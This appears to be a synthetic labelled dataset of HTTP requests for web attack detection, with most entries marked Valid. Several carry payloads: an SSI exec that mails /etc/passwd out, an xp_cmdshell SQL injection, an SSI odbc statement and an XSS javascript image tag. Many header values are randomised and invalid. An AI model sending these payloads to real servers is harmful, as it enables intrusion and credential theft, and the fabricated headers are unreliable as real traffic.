Content-Location: http://www.syeavot.uk/ttma/pe4nnt2/clsrmeeV/hadge.msf
Content-MD5: ZHMwbWRhZXN4Q2VyZHBoYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 12 May 05 09:54:49 GMT
Last-Modified: Thu, 19 Mar 09 16:05:13 GMT
Host: www.winz.net
Connection: agcy2
Accept: */*
Accept-Charset: cp-950;q=0.1, iso-10646-ucs-2;q=0.1, windows-1257;q=0.3
Accept-Encoding: 
Accept-Language: h-iso;q=0.3
Cache-Control: no-transform
Client-ip: 10.132.27.249
Cookie: etNbttyt=49145963
Cookie2: $Version="74"
Date: Sun, 06 Sep 09 13:52:58 UTC
ETag: W/"7JLDRJNPufFa6FJpy1C"
Expect: 100-continue
From: Deit2tin@frt4se8ha.be
If-Modified-Since: Thu, 01 Nov 07 13:35:24 CET
If-Unmodified-Since: Thu, 22 May 08 17:00:44 UTC
If-Match: "UTYPPFy0y_Kk_.1"
If-None-Match: *
If-Range: Thu, 01 Apr 04 06:06:28 GMT
Max-Forwards: 3963
MIME-Version: 1.5
Pragma: KpEf='9'
Proxy-Authorization: NTLM bW9lbUFiaGVuclNqaW9vYmVXanQ0dHNkYWdpbGxqbnhlZ2FyZWVhUG1mbm1l
Authorization: osis laalnw=Osddk7
Range: 08944-,040-34609
Referer: http://www.pdxsEets.de/fbipri.swf
TE: trailers,trailers,trailers
Trailer: If-None-Match
User-Agent: Mozilla/4.9 (Machintosh; U; Mac OS X 4.6; i0-ro; rv:2.4.1) Gecko/64956466
UA-CPU: Sparc
UA-Disp: 5852,332,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 088x2493
Via: FTP/7.2 www.oropi.html:3, HTTP/5.5 251.60.238.238:9, 6.2 30.132.212.238
Transfer-Encoding: identity
Upgrade: hearu/8.5
Warning: 502 www.tuiesn.jpg:49189 "yihldehotit" 
X-Forwarded-For: 108.165.196.92
X-Serial-Number: 46703519834930865656
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

le0xmeljCcisr=eu.v&te=Ra%29&its8dek18resacZ=g%28e&SDOcFw=9stDa1tpkngqt&e1lbtuneicb6i=dV_-d&p7u7eivy9g40e=31185&i7%uUpJy15J_=dzwo&Udlb4=%3Bef%3E&MTposition3bKE=eobjectohopene%7Eteeinclude8ete1lp47&uiDsoo0=m%7EeBL

End - Id: 6230
Start - Id: 29637
class: Valid
GET /6QGPSc1Dl3bYiV-1K/eWZt0k/qoiheI7rtnnasmVswta/aBF2Q-/eOiYIQ5oePfCeVsO/o7deeaa0iietll9bpdn/0HvarjQlrj.png? HTTP/1.0
Host: www.spu2hee.it
Connection: keep-alive
Accept: application/zip;q=0.2
Accept-Charset: koi8-r, x-mac-arabic;q=0.8
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 180.238.202.202
Cookie: 9ttzKeKeJqgs=lRi;Seaeo=kotAeuA7apinVEa;@.evalus=walrtfhisit;9NrmU=05757204
Cookie2: $Version="31"
Date: Sun, 08 Jul 07 16:56:31 UTC
ETag: W/"YgrVF1W@QPY1ZGuG"
Expect: 100-continue
From: serlgoma@7stltqn9.org
If-Modified-Since: Thu, 25 Jun 09 15:45:28 CET
If-Unmodified-Since: Sat, 20 Jun 09 11:23:39 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1
MIME-Version: 0.3
Pragma: lmeee=ao
Proxy-Authorization: Digest username="zohhys"
Authorization: NTLM ZWVlUjBFczhyb2dvdHNodG93TmRjbnJiZnFpY2UwbHI=
Range: -146,1-593943,-3282
Referer: http://www.r4attsM.org/eAnSxT6o.gif
TE: trailers,gzip
Trailer: If-Match
User-Agent: awsso (nhKT0C; acOMkNryB)
UA-CPU: MIPS
UA-Disp: 488,829,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 423x5834
Via: HTTP/8.4 101.5.220.247
Transfer-Encoding: oaii
Upgrade: tdet/1.8, gtr/7.8, l8sivs/5.8, aedub/5.6, a2nlas/3.5
Warning: 905 147.211.113.57 "ut3heeeieiot9bsLowbz" "Fri, 21 Mar 08 14:56:41 UTC"
X-Forwarded-For: 193.139.126.154
X-Serial-Number: 149051815209
----: ----------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 29637
Start - Id: 39918
class: SSI
PUT /yzvOob.php4? HTTP/1.0
Content-Length: 118
Content-Language: 9iF
Content-Encoding: compress
Content-Location: http://tiuiwosr.org/biwrye/2rLr7s.css
Content-MD5: Y21ocnRvenRybjVpczg1aA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 07 Jun 04 06:15:29 UTC
Last-Modified: Thu, 23 Jul 09 19:55:20 UTC
Host: www.uald8alc.be
Connection: close
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: gzip, gzip;q=0.3, compress, compress
Accept-Language: *
Cache-Control: no-store
Client-ip: 239.36.31.16
Cookie: wiasorbreopueet=3
Cookie2: $Version="724"
Date: Sat, 02 Apr 05 22:54:00 GMT
ETag: "oFCCtwKdqig7svS9H"
Expect: 100-continue
From: 7v1w1el@eidae.cz
If-Modified-Since: Sun, 16 Nov 08 24:46:35 UTC
If-Unmodified-Since: Sun, 05 Feb 06 04:13:50 UTC
If-Match: *
If-None-Match: "S8jwtcrJR3cTv9_"
If-Range: "10khbgQprWoU-9QDKDXF"
Max-Forwards: 040
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: Digest response="dD0B7d539F14ACC6a145A7c016DF9930"
Authorization: Basic ZGhBaGFpYW46RXVzb0FvZmc=
Referer: http://tosyMSt.ch/doptaTmt/mtap/Psnehl/utdiu/tsra.msf
TE: trailers
Trailer: Trailer
User-Agent: Mozilla/4.4 (compatible; tMbUta; Open BSD i586; sseo4a)
UA-CPU: StrongARM
UA-OS: Win9x
UA-Color: color16
Via: 0.8 193.69.194.244
Transfer-Encoding: areae; hi6ivrg=otTAo5e
Upgrade: enw/1.2
Warning: 151 www.ttt8oAn.jpg "coIndbni" 
X-Forwarded-For: 54.46.237.13
X-Serial-Number: 2450299915461461
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

o0mrtiQesnc=<!--  #exec  cmd="/bin/mail    hiulttltn.com  < /etc/passwd"-->&Irnrerrya=ief5tgwl

End - Id: 39918
Start - Id: 28427
class: Valid
GET /eao0emtoubpV/kziJCu@u2v/hpsDOUmqprocessing-instructionnGT/ehArRoY/nK/eu/o4eeTi.png?pEsca=gagntrj&fprgysAh5e=4&tvWhaptTfahp=eHiaN&ic0Sdhl=Ti%5Copenasamcrbgsoundn&aLonri=o5l2&eEn8srtraibgcs=%24+&kntrtg7Mr2=t&mr=s3Xtp33As&p2mh=04473 HTTP/1.0
Host: www.aorledem.uk:80
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-japanese, windows-1257, us-ascii;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 218.83.162.0
Cookie: cylouL7h=between]qo ttt  ranhtpassrO&e ;Abt=19;seasg=0428877554;kQlLcumnzpr1=str
Cookie2: $Version="380"
Date: Mon, 14 Aug 06 19:58:16 UTC
ETag: "iDpU2wJ..PsGKz9YRaoC"
Expect: 100-continue
From: oBcae9t@txO3eond.biz
If-Modified-Since: Tue, 10 Apr 07 08:17:38 GMT
If-Unmodified-Since: Wed, 13 Oct 04 11:31:35 CET
If-Match: "zMDQ5Mfl9MXaYzRf"
If-None-Match: *
If-Range: Sun, 15 Mar 09 04:48:24 CET
Max-Forwards: 3
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Basic TDcxeWh0OmV0N2F0bmVl
Authorization: NTLM ZHBhZ3RobndUc3Rza2x6NGVmaGN3b3RlYm04bmptcnRs
Range: 9246-,43437-,-51100
Referer: /eygestb/nnein/Sit7.php4
TE: trailers
Trailer: Accept-Encoding
User-Agent: SaRhet
UA-CPU: 68000
UA-Disp: 4475,557,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 6329x3487
Via: 1.4 www.eaty2w.html, HTTP/9.7 www.Sodkzny.png, 14gina/3.8 www.iace.jpg
Transfer-Encoding: gzip
Upgrade: fioa/5.4, weeo/7.8, l0s/3.4, srerh/3.7
Warning: 999 www.inZhH.jpeg:2 "ret1" 
X-Forwarded-For: 7.153.57.18
X-Serial-Number: 15983235
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28427
Start - Id: 35066
class: SqlInjection
GET /en2ILsw5Q9Wm8033/as7o3e4vfy2fqoo/al/fFcmdB6D5c0VhE/rhTunNk3u5WkBYzQQ.exe?vdewoRujNiOh=%5D1ae&dssso6=1&ksfe=ubetween%27etcejt&hep7siHxaee=connectwootmp&snnioBi=%27%3BEXEC+++++master.dbo.xp_cmdshell++++%27cmd.exe&shie2Iad=uJlJYLj1&ae=pi5us0mhi2noiN6ls&eC=a%7ETp5&4_4mSUb=ivqpvhxnXxJ&snce=7517&oreasc0ns=001430&oeEaov=aClwu HTTP/1.1
Host: www.nndex.gov:80
Connection: keep-alive
Accept: text/html;q=0.6
Accept-Charset: iso-8859-15, euc-kr;q=0.9
Accept-Encoding: identity;q=0.4, compress
Accept-Language: deuqs9-invc;q=0.5, ioaaoa-u4a, orr-hh
Cache-Control: etitooB=l
Date: Mon, 26 Jun 06 05:31:26 UTC
ETag: "@Q2pOBJcB38UINBAlX"
Expect: 100-continue
If-Unmodified-Since: Sun, 11 Mar 07 02:35:49 GMT
If-Match: *
If-None-Match: *
If-Range: "h7WuS6TXod.9Ov3fP"
Max-Forwards: 815
Pragma: rT3='saO'
Proxy-Authorization: NTLM aWQ5MGNBYXNhcmdFZW1zdGlpdDJpN0EyZGxybGxpbmlTZQ==
Authorization: ooeda eestum=adtm
Referer: http://onv6cS.uk/ad0ev/clfaeegm/n39w/coustn8p/lqeeri7.bin
User-Agent: Mozilla/6.9 (Machintosh; U; PPC 6.8; ut-se; rv:8.3.3) Gecko/81154608
UA-OS: WinNT
Via: 3.8 19.239.68.151
X-Serial-Number: 074180308
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35066
Start - Id: 26295
class: Valid
GET /ei9c.png? HTTP/1.0
Host: 65.120.103.124:1919
Connection: hmheseo4
Accept: */*
Accept-Charset: iso-8859-1;q=0.1, koi8
Accept-Encoding: deflate;q=0.1
Accept-Language: *
Cache-Control: max-age=7
Client-ip: 212.123.6.21
Cookie: yABdh=en3aaaileAe;G70acceptla-gQsock_stream=samdsock_stream6eo3processing-instructionRwm t%includera;UynPGC=285;eid=eir+
Cookie2: $Version="03"
Date: Wed, 17 Jan 07 24:17:19 UTC
ETag: W/"A1p6v@r8DNg9iIPR-h3"
Expect: 100-continue
From: Htoian@ttglhxafws.fr
If-Modified-Since: Tue, 07 Oct 08 02:41:37 GMT
If-Unmodified-Since: Fri, 14 Oct 05 24:09:48 UTC
If-Match: "3LA6xzVR7pnDMtHtZ"
If-None-Match: "iVL7vKFTge0yQQn"
If-Range: "rjYgwEuyfWlVT1Guh"
Max-Forwards: 39
MIME-Version: 7.8
Pragma: sh='sLdin'
Proxy-Authorization: Digest username="dnqaohe"
Authorization: Basic RXV0aWRBbDpsdmxp
Range: 338-840605
Referer: http://bse6z.st/axxw7h/iisaet.php4
TE: gzip,trailers,trailers
Trailer: Date
User-Agent: Mozilla/9.8 (Machintosh; U; PPC Mac OS X 7.1; ua-cA; rv:2.1.1) Gecko/45103369
UA-CPU: MIPS
UA-Disp: 052,216,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 3902x9522
Via: 7.1 www.odh6sc.png, 5.6 208.95.43.86
Transfer-Encoding: gzip
Upgrade: liya/7.1, bae/3.3, ava/0.7, 6we6/3.5
Warning: 819 98.6.36.71:255 "RaKuekinwrtwA" "Fri, 28 Mar 08 01:50:15 GMT"
X-Forwarded-For: 212.21.79.197
X-Serial-Number: 93545623104
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26295
Start - Id: 27902
class: Valid
GET /Oetp7sdttddRsv/hrNc/sSXtv1eWJJn/Z9t60/tHarpmxysLveLs/psg@3aR1/taEstD9oE.mdb?zt=78&vJdewteo=9-J&te=6&hniy=spoliarni+&E3Toh52ezlmrtd=-re&gE9ncPA7pnEoet=421408&d3taABtieuhuofp=naofh&2@c6Gf2IOsock_streamrO=ie&ogeIoarElhenm=i&S83f0a=wp-%3At&aDrtgeor03s3n=jj0txe HTTP/1.1
Host: 71.145.196.60
Connection: close
Accept: application/x-tar, video/quicktime
Accept-Charset: *;q=0.4
Accept-Encoding: deflate;q=0.0, compress;q=0.7, identity, deflate;q=0.8, compress;q=0.0
Accept-Language: *;q=0.7
Cache-Control: max-stale=2
Client-ip: 217.171.87.254
Cookie: ahesgT1di1ny=89782154;ky4J8SCobjectincludee4=198997;s2kUtEariTn=xp_c systemshutdown;z1roleeesCor=7f84QQ;avNX=14
Cookie2: $Version="6"
Date: Mon, 02 Nov 09 19:53:14 CET
ETag: "XncvKXDgiEVJXFsZFPyv"
Expect: 7rwrf
From: ksaefm@Ittg.fr
If-Modified-Since: Wed, 26 Sep 07 24:22:37 CET
If-Unmodified-Since: Sun, 22 Aug 04 10:43:33 CET
If-Match: *
If-None-Match: "094S9s@Wun4llYkAYJq"
If-Range: *
Max-Forwards: 191
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: Digest username="tI16oce"
Authorization: NTLM dGlzYmdndXJlc2F0ZW9saXJ3bnlpYnJkaXhVeGRidG9zczRxaGlzQTIxaHJhbw==
Range: 6-04307,08-
Referer: http://www.nyrlgido.biz/hfno/ytt4seng/notes/nSIa5ez/ewimNr.avi
TE: trailers,gzip;q=0.6,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/3.5 (Windows; U; WinNT 9.9; us-as; rv:8.5.2) Gecko/66582208
UA-CPU: x86
UA-Disp: 3738,726,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 869x220
Via: HTTP/1.3 244.220.140.237, 7.4 www.aIusl9e.css
Transfer-Encoding: compress
Upgrade: set0s1/4.2, y0tTe/1.1, kaxgt/4.9, 7lzo/0.2
Warning: 691 www.sindzeae.jpg:0 "9mntxonwreh" "Thu, 27 May 04 12:00:03 GMT"
X-Forwarded-For: 141.34.54.32
X-Serial-Number: 7257164
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27902
Start - Id: 12028
class: Valid
GET /r7Z8VZf6TSl.qV3VmC6H/wlLqtyFtTwk_z@Uu/RNdaiicc/a0KX.dHDE/tLwtWlmrHn.FYj0l.F6h/7Wuw2U4MiAN/u3W/suceDwA5cLs/pt/of84R/nA_PZLvnsQCojLg.htm?er=6308920941&Um1VxmlZuG=7eetia5&cmwOcceSnj=e0eae3dAainsertitn+mlink&6HYLsw2oFh=778732&drhshhu=79721&st8enotphtxb=ltmpcjdrops&unieceeGegN=etc%3DfOcTnroav&roXYf=57713235&i8petHotsEemon=%2Bte&mrtr1rt=22037&tsmt=047535&n8dtu8mf5=97&xnih=o&e9lf3iia4e=apXf%401g&mtraneaLtlcjau=swo8ilehKradc3nlam HTTP/1.1
Host: www.etlsaREz0l.com
Connection: itrren
Accept: image/gif, text/html;q=0.9
Accept-Charset: iso-8859-15, x-mac-hebrew;q=0.9
Accept-Encoding: *;q=0.1
Accept-Language: yuekFcrx-SschdAe, a8tHn-te, eh-ed;q=0.6, nhio-em, ej-elln
Cache-Control: min-fresh=17055
Client-ip: 212.233.5.70
Cookie: eeaii=mThdB@qKMh;NRAoS=nLOWir;locationSxadminidQrtnph-H=dshn(dNa;4t=05
Cookie2: $Version="33"
Date: Sun, 25 Oct 09 19:17:18 GMT
ETag: "4VdNvDxnQ_vOTnM_5thW"
Expect: Sqoc8=h1egNw
From: bteasrrn@to2anee.fr
If-Modified-Since: Mon, 07 Apr 08 19:55:42 GMT
If-Unmodified-Since: Sat, 02 May 09 22:08:15 GMT
If-Match: *
If-None-Match: "4qldFHMbB3wGsuO"
If-Range: *
Max-Forwards: 1
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: Digest nc=117fd3f5
Authorization: NTLM dG9sYTFUZW9ldHBuZnJpUmVURGV0b2l4Y2RBcmVuOFo0cw==
Range: 7584-,-2,4553-54899
Referer: http://www.iqarenL.com/Yialoe/ivegj/ousjqo/ehsueo/oegtrtca.txt
TE: trailers,chunked;q=0.4,gzip;q=0.6
Trailer: Via
User-Agent: Mozilla/4.3 (Windows; U; Windows NT 9.8; nc-r2; rv:5.4.9) Gecko/91679269
UA-CPU: x86
UA-Disp: 123,4822,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 165x736
Via: 3.1 228.169.174.162, HTTP/8.1 43.175.251.105
Transfer-Encoding: identity
Upgrade: trto/1.0
Warning: 833 144.28.17.62 "isfwPh1kyWgl" "Sun, 24 Sep 06 16:28:02 UTC"
X-Forwarded-For: 46.91.218.72
X-Serial-Number: 447031171
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12028
Start - Id: 1648
class: Valid
GET /veeoh4Mm8/lchild56iframe-lbUp7ibin/sP90EQ3o729bobhoAjg/edxESnxrp_08@hK/4tm7a/sNrprocessing-instruction2pNCShX/ostit5ee/Fbhe/dduteqr3metaye/h4upjnoHRsme.mdb?snnu8o=1hEn%27a%2Bs&nntg3tisHpd=%24L&2wcreR=tSIVFayJzO&diieec=46&c00edirhrVgyfa=66&sgnhcMyseeudo=154468&3@telnetAEqmlky=810173 HTTP/1.0
Host: www.ihdijgd.be
Connection: close
Accept: */*;q=0.3
Accept-Charset: x-mac-roman, iso-2022-jp;q=0.0, x-mac-roman;q=0.2
Accept-Encoding: 
Accept-Language: etwh-oalofnt, Lbirae-liransee;q=0.7, Rrmbl-Rsingr9e;q=0.5, enna-otrx4dhy, io0ts-s
Cache-Control: max-stale=8
Client-ip: 233.154.243.51
Cookie: rfahiezo=tclspleiAliarg2iMa;islvuc7=likepasswd istdinl ;retwahehr8rq2sm=u6TiV6NJ;tdycrdrBorh=]nnodei;Y-O-H=sP3Rt;grdhfh=1teoa
Cookie2: $Version="616"
Date: Wed, 10 Jan 07 07:43:41 UTC
ETag: "hnb.G_M4W3GdT9L4bXGP"
Expect: hnxtayv
From: S6tD@nser.com
If-Modified-Since: Fri, 26 May 06 20:09:07 UTC
If-Unmodified-Since: Sun, 21 Jun 09 02:30:56 UTC
If-Match: "c0rEf_6b2B--8pL@Dep@"
If-None-Match: "nvxhQ2q3l23iJF9C4"
If-Range: Wed, 15 Apr 09 09:16:50 UTC
Max-Forwards: 7161
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: Digest response="bbDfe1acD0cE17D8d4AB2A7cdbb2Df5b"
Authorization: Digest nc=fdbDdF1a
Range: 38957-
Referer: http://www.i2iw.cz/mEon.mdb
TE: trailers,trailers
Trailer: Trailer
User-Agent: ksbbjd2esuedAiHagd
UA-CPU: 68000
UA-Disp: 6093,2247,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 7605x6639
Via: 3.5 www.m06ete.htm
Transfer-Encoding: bibnm
Upgrade: 1neao/3.0, tome/1.5, athaw/7.1, axd3ou/1.8, Iet/4.7
Warning: 043 205.130.181.187:01570 "r9oi9t" "Thu, 28 Jul 05 10:14:18 GMT"
X-Forwarded-For: 111.79.187.206
X-Serial-Number: 65212341307
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 1648
Start - Id: 40957
class: SSI
PUT /ez1QxX/umlosns8pneosv43t5Ae/FT-6VF0o8Ln/6RP/BDkcmd_D/xqUSbTP4bHNZ4eNpj9/reetVetr/s90Npm/mah8niT2h.png? HTTP/1.1
Content-Length: 58
Content-Language: teb2
Content-Encoding: gzip
Content-Location: /lmAn/IRfqrjks/ieli/hdmatM/diruqghw.wav
Content-MD5: b3JybnJhTm1lZG1pZzlyag==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 22 Jun 06 18:27:06 UTC
Last-Modified: Thu, 01 Mar 07 23:37:24 GMT
Host: www.2Rel.ch
Connection: close
Accept: text/*;q=0.4
Accept-Charset: *;q=0.2
Accept-Encoding: deflate, deflate;q=0.2, identity;q=0.4
Accept-Language: <!-- #odbc    statement= "select     li2rEtwt,    ewob6to,     krr7 from  l6tzrr    order     by    4, 635,     5"    -->
Cache-Control: no-transform
Cookie: wrieiomi=yQh;ftufe0V=rJp;utrUtelngo=o~];ots=hkaROD35P;UrY9ty=597580553;mboiME=8si1di8ii
Cookie2: $Version="757"
Date: Thu, 29 Dec 05 21:36:21 GMT
Authorization: oAta5 andltten=ehassyi
Referer: http://cmarvne.it/nhid74/air9nEr/msdohtrd/hxei/lvtaa.mpg
Trailer: Accept-Encoding
User-Agent: hneu/0.5.3.8.5
X-Forwarded-For: 102.101.60.89

eflhysQnm=f1&sOtnmh=6brwRni&oohe2renz=755056&itbohcomN=898

End - Id: 40957
Start - Id: 17531
class: Valid
GET /mYO996Ljbq5Cvzm/allB/nY/4i2Eh@6/5zand/T5Qnode@AROwoH/oawe./s0lPBGn-@H@516/dnNOuj.RIX/aGsFXfULOXV_/dhB.htm?8oaftytaig=4603663548&VE4XnL8pmm=w&ydeaachnahi4g=dddp3ose&ert=loam++im7+e%5D1Nr HTTP/1.0
Host: www.ieTi.gov:80
Connection: wSoeaIad
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: no-cache
Client-ip: 97.28.180.226
Cookie: Mqnnr16Ar4=sain3uri374aet5e
Cookie2: $Version="136"
Date: Mon, 03 Dec 07 14:40:31 UTC
ETag: "1g_u5BtP8Mm9p3Op"
Expect: 100-continue
From: eqwswlc@oml3s.net
If-Modified-Since: Mon, 20 Jul 09 20:42:52 UTC
If-Unmodified-Since: Sat, 23 Apr 05 19:36:18 UTC
If-Match: "ye0ZcYYMtTUXVbp"
If-None-Match: *
If-Range: *
Max-Forwards: 865
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: Basic YTFubDpleTFzbnVl
Authorization: NTLM aXJ0WGVrYTNpYm5uMG1laGxlNG5lOXJseW54ZXNhdGFpdWFvYg==
Range: -93,-08,01267-
Referer: /uvgnt/exeZssi/ot9esra.php4
TE: trailers,deflate
Trailer: Range
User-Agent: aindiEe6deodaiz
UA-CPU: StrongARM
UA-Disp: 7555,797,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 845x6872
Via: 1.1 www.tToEu.png, FTP/2.7 202.20.101.145
Transfer-Encoding: ho0hsg
Upgrade: fuSuX4/5.4, Pyeaes/7.2, nobos/1.0
Warning: 578 www.cuZgchp.tiff "esuto1wenhlasinfem" "Mon, 23 Mar 09 10:21:32 UTC"
X-Forwarded-For: 108.35.186.201
X-Serial-Number: 8525690441
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17531
Start - Id: 47448
class: XSS
GET /oWT-J4Gn/36JTo.vrYdY.js?JTah=%3Cimg%2Bsrc%3Djavascript%3A+++alert++++%28%27tfkaA.e%27%29%3E HTTP/1.0
Host: www.okNeSmmvba.st
Connection: close
Accept: text/*;q=0.7, audio/*;q=0.1, video/*
Accept-Charset: *;q=0.4
Accept-Encoding: deflate, compress;q=0.2, deflate, identity;q=0.0
Accept-Language: *
Cache-Control: max-age=1668
Client-ip: 125.166.89.173
Cookie: _XyA-aTP@servicesP=Rscriptal
Cookie2: $Version="79"
Date: Sun, 16 Oct 05 01:12:43 GMT
ETag: "xMu08ozzBwiL@pSdUkT"
Expect: emr8ts
From: eskhrz@f8eyrrtmw.biz
If-Modified-Since: Wed, 30 Jan 08 18:02:43 GMT
If-Unmodified-Since: Tue, 10 Feb 09 14:23:35 GMT
If-Match: "y4aOGzYbVyyNL_VM"
If-None-Match: *
If-Range: "60VbaHM_D1OFTdgY-"
Max-Forwards: 0
MIME-Version: 8.8
Pragma: h=pu7
Proxy-Authorization: Digest qop=auth-int
Authorization: Digest cnonce="eiunos"
Range: 9547-817639
Referer: /hE5swfti.asp
TE: deflate,trailers,trailers
Trailer: If-Range
User-Agent: Mozilla/0.9 (Windows; U; WinNT 7.4; zp-uU; rv:1.7.2) Gecko/74959231
UA-CPU: MIPS
UA-Disp: 1377,371,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 644x740
Via: 4.2 www.neOanoi.html, HTTP/1.7 59.42.254.106, 8.1 160.65.172.213
Transfer-Encoding: Ullno; roei5ks1=fs2t7t2
Upgrade: tah/4.0, bipq/1.5, o5rz/9.5
Warning: 281 www.x8r0s.tiff "js1edtagecg" "Sat, 28 Jul 07 11:01:34 UTC"
X-Forwarded-For: 188.156.102.66
X-Serial-Number: 226091720709125
----: --------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 47448
Start - Id: 29913
class: Valid
GET /oqwYl/oIqgJdo/spdytae.html? HTTP/1.0
Host: www.ouhpiow.it:80
Connection: keep-alive
Accept: */*
Accept-Charset: cp-936, x-mac-hebrew, us-ascii;q=0.1, isiri-3342;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 187.131.153.162
Cookie: agezdoexx9=ip;owcuvoong=eo1so;tseotysno=95
Cookie2: $Version="15"
Date: Thu, 23 Dec 04 04:07:53 GMT
ETag: W/"7MRCAMCo4sZHzVITp"
Expect: 100-continue
From: uudtsny@Iiar7.st
If-Modified-Since: Thu, 14 Sep 06 15:19:06 UTC
If-Unmodified-Since: Sun, 23 Jan 05 24:48:57 CET
If-Match: "Ot8WDR3KHAJx7hT3d"
If-None-Match: "h.JJJCSfv@_xQ8vk6"
If-Range: *
Max-Forwards: 1
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: meaud m7h0u=nztdpF
Authorization: giiOst melen=sou1ni
Range: 73-062771
Referer: http://tehevsn.st/odrhedrr/dTon8/tYtls2md.mspx
TE: chunked;q=0.7
Trailer: Pragma
User-Agent: Mozilla/1.7 (Windows; U; WinNT 8.9; nz-bT; rv:5.9.7) Gecko/49440832
UA-CPU: 68000
UA-Disp: 5197,782,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 3101x221
Via: HTTP/6.6 148.49.110.51:16, 6.6 www.uuer0tv.jpeg, FTP/2.4 www.ArnHlHe.shtml
Transfer-Encoding: Unga; e1eka=snrAe
Upgrade: spt/3.7, rs8xQ/8.1, ovEla/6.7, hsp/5.3, ecaol/5.8
Warning: 601 103.90.185.56:00009 "bInvy9od2reoewohbO" "Thu, 26 Mar 09 12:32:40 UTC"
X-Forwarded-For: 24.63.210.94
X-Serial-Number: 89410
----: ------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 29913
Start - Id: 31067
class: Valid
GET /9L3OZaWQ/c1gNLJ6dQSJl4OAI98TU/imitoeoI/snn75eh/iEghvcdeQ0/iKKlEmD4oQbwl26aO/n07EgjX.Oc7/.Iv3Mi93g.jpeg?twi=7JrcPFY8W9&hhos5flzvd8=645734495&noieaitskrex=itqauwhhxdacashny&Aobli=7345818&ixr3hrNt=jfewse&sz8=6 HTTP/1.1
Host: 246.246.130.132
Connection: 6ac9m
Accept: video/*
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: c3-8rtgf9Cn, ete-mret;q=0.9
Cache-Control: min-fresh=36717
Client-ip: 13.189.196.53
Cookie: thiTMte=oitselogeUafromtc;nesatffy28Ustow=90817003;uISLb=th\Evnclt-=;9tfgngatd7=?;wVn8c-PRE4=5x.vV14;e2Wiqntsenrdv=&
Cookie2: $Version="69"
Date: Fri, 06 Oct 06 01:33:08 UTC
ETag: W/"UHmlLqgMwHtvrSN"
Expect: imamsYsm
From: tyfhs@svdrsronma.st
If-Modified-Since: Sun, 16 Oct 05 11:50:14 GMT
If-Unmodified-Since: Thu, 08 Jan 04 21:17:25 GMT
If-Match: *
If-None-Match: "ODQe2XECcIV7dxtOa2SO"
If-Range: Sat, 04 Oct 08 14:54:30 CET
Max-Forwards: 97
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: Basic VHI2c2lkOnRsZTU2NDU=
Authorization: CtsI2 0dmEtoa=bNtev
Range: 9-,-547,201167-8758
Referer: /s9hst/nlbrm/ewtliewi.gz
TE: trailers,trailers,gzip;q=0.9
Trailer: Accept-Encoding
User-Agent: Mozilla/8.5 (compatible; MSIE 3.1; Linux i386; pdq1tmYmdE; Ntn2oTwpD; lyahiasswd)
UA-CPU: 68000
UA-Disp: 7666,0977,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 295x182
Via: 0.5 79.201.144.251, 1.8 www.oouoe.js
Transfer-Encoding: deflate
Upgrade: shD8H/3.6, er42/9.5, hnAts9/4.3, Napco/8.1, eayeb/0.1
Warning: 726 100.194.112.153 "sOwa0" "Fri, 28 Jul 06 22:45:21 CET"
X-Forwarded-For: 77.155.203.24
X-Serial-Number: 0797621
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31067
Start - Id: 14106
class: Valid
GET /wMN_roK/nincludeP/tna5in0aoaNrr.mdb?mnl=efDiljNv9ewD&hw0triIdnauaywy=547&rmeuoee4=exCSKITWptx&pe8eeseif=%28%24&1tfwosbn=e9jHMBkxF&fl=238260902&g3fmaa842pRfea=89 HTTP/1.1
